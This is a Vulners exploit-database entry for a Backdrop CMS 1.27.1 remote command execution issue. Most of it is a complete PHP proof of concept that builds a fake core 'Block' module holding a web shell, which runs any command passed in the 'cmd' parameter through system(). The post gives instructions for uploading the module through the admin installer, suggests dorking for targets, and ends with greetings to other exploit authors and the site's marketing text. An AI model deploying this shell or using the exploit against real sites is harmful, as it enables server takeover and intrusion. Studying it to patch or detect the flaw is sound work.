Vulners
Lucene search
Backdrop CMS 1.27.1 Remote Command Execution
=============================================================================================================================================
| # Title : Backdrop CMS 1.27.1 PHP COde Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP
(Related : https://packetstorm.news/files/id/178631/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php script.php [url]
[+] PayLoad :
<?php
function create_files() {
$info_content = <<<EOL
type = module
name = Block
description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a
web page.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
EOL;
$shell_info_path = "shell/shell.info";
if (!file_exists(dirname($shell_info_path))) {
mkdir(dirname($shell_info_path), 0777, true); // إنشاء المجلد إذا لم يكن موجودًا
}
file_put_contents($shell_info_path, $info_content);
$shell_content = <<<EOL
<html>
<body>
<form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset(\$_GET['cmd'])) {
system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>
EOL;
$shell_php_path = "shell/shell.php";
file_put_contents($shell_php_path, $shell_content);
return [$shell_info_path, $shell_php_path];
}
function create_zip($info_path, $php_path) {
$zip_filename = "shell.zip";
$zip = new ZipArchive();
if ($zip->open($zip_filename, ZipArchive::CREATE) === TRUE) {
$zip->addFile($info_path, 'shell/shell.info');
$zip->addFile($php_path, 'shell/shell.php');
$zip->close();
}
return $zip_filename;
}
function main($url) {
echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
sleep(3);
echo "Evil module generating...\n";
sleep(2);
list($info_path, $php_path) = create_files();
$zip_filename = create_zip($info_path, $php_path);
echo "Evil module generated! $zip_filename\n";
sleep(2);
echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
sleep(2);
echo "Your shell address: $url/modules/shell/shell.php\n";
}
if ($argc < 2) {
echo "Usage: php script.php [url]\n";
} else {
main($argv[1]);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2025 00:00Current
7.7High risk
Vulners AI Score7.7